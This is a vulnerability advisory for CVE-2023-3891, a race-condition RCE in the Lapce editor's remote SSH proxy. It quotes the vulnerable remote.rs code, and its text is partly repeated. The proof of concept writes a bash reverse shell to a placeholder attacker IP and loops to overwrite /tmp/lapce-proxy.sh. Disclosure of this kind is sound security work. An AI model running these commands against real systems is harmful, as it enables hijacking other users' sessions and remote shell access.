Description
Lapce v0.2.8 has a logical vulnerability in its code which can be used by an attacker to obtain RCE on the server. This is made possible by downloading a file remotely to a path where an attacker can manipulate the file being downloaded. This is made possible by a Race Condition vulnerability in the code.
Vulnerability
A Remote code execution via Race Condition vulnerability was identified in Lapce v0.2.8, which is the result of several bad practices that allow a user with access to the local network to breach the system and obtain RCE.
This is the vulnerable file:
remote.rs
_ => {
let local_proxy_script =
Directory::proxy_directory().unwrap().join("proxy.sh"); // The file is obtained
let mut proxy_script = std::fs::OpenOptions::new()
.create(true)
.write(true)
.open(&local_proxy_script)?;
proxy_script.write_all(UNIX_PROXY_SCRIPT)?;
let remote_proxy_script = "/tmp/lapce-proxy.sh";
remote.upload_file(local_proxy_script, remote_proxy_script)?; // Here, the file is uploaded to the SSH server. From this point, the attacker needs to overwrite the proxy.sh script.
let cmd = remote // At this point, the proxy.sh script needs to be overwritten to achieve Remote Code Execution (RCE)
.command_builder()
.args(["chmod", "+x", remote_proxy_script]) // The script is granted execute permissions.
.output()?;
debug!("{}", String::from_utf8_lossy(&cmd.stderr));
debug!("{}", String::from_utf8_lossy(&cmd.stdout));
let cmd = remote
.command_builder()
.args([
remote_proxy_script,
if meta::VERSION == "debug" {
"nightly"
} else {
meta::VERSION
},
remote_proxy_path,
])
.output()?; // The script is executed.
debug!("{}", String::from_utf8_lossy(&cmd.stderr));
debug!("{}", String::from_utf8_lossy(&cmd.stdout));
cmd.status
}Exploitation
Exploiting this vulnerability requires access as a user on the remote server (or local, in case a user is trying to connect as another user on the same computer). Once you have that access, you must go to the tmp directory and execute the following commands:
echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1" > /tmp/test.sh
while true; do cp /tmp/test.sh /tmp/lapce-proxy.sh || chmod 755 /tmp/lapce-proxy.sh ;done &>/dev/null
Evidence of exploitation
It should be noted that this vulnerability is possible because a file is being downloaded to a folder where any user could write files, and if the file is created at the time it is being downloaded, it would be overwritten allowing an attacker to manipulate the original operation of the script and gain RCE on the system.
To exploit the vulnerability just use the PoC code above in the console, and wait for the user to try to log into a remote server using the SSH service implemented by Lapce. This attack would only occur if the script is created before Lapce generates it, if it is already generated, you would have to wait until the temporary content is deleted.
In the following video you can see in more detail how would be the process to exploit the vulnerability.
Proof of Concept video
Update
Here is another video explaining what an attacker can achieve with this RCE:
Privilege Escalation
Our security policy
FluidAttacks have reserved the ID CVE-2023-3891 to refer to this issue from now on.
System Information
- Version: Lapce v0.2.8 (2023-06-01)
- Operating System: MacOS
Credits
The vulnerability was discovered by Renzo Machado from Fluid Attacks
Offensive Team.
Description
Lapce v0.2.8 has a logical vulnerability in its code which can be used by an attacker to obtain RCE on the server. This is made possible by downloading a file remotely to a path where an attacker can manipulate the file being downloaded. This is made possible by a Race Condition vulnerability in the code.
Vulnerability
A Remote code execution via Race Condition vulnerability was identified in Lapce v0.2.8, which is the result of several bad practices that allow a user with access to the local network to breach the system and obtain RCE.
This is the vulnerable file:
remote.rsExploitation
Exploiting this vulnerability requires access as a user on the remote server (or local, in case a user is trying to connect as another user on the same computer). Once you have that access, you must go to the tmp directory and execute the following commands:
Evidence of exploitation
It should be noted that this vulnerability is possible because a file is being downloaded to a folder where any user could write files, and if the file is created at the time it is being downloaded, it would be overwritten allowing an attacker to manipulate the original operation of the script and gain RCE on the system.
To exploit the vulnerability just use the PoC code above in the console, and wait for the user to try to log into a remote server using the SSH service implemented by Lapce. This attack would only occur if the script is created before Lapce generates it, if it is already generated, you would have to wait until the temporary content is deleted.
In the following video you can see in more detail how would be the process to exploit the vulnerability.
Proof of Concept video
Update
Here is another video explaining what an attacker can achieve with this RCE:
Privilege Escalation
Our security policy
FluidAttacks have reserved the ID CVE-2023-3891 to refer to this issue from now on.
System Information
Credits
The vulnerability was discovered by Renzo Machado from Fluid Attacks
Offensive Team.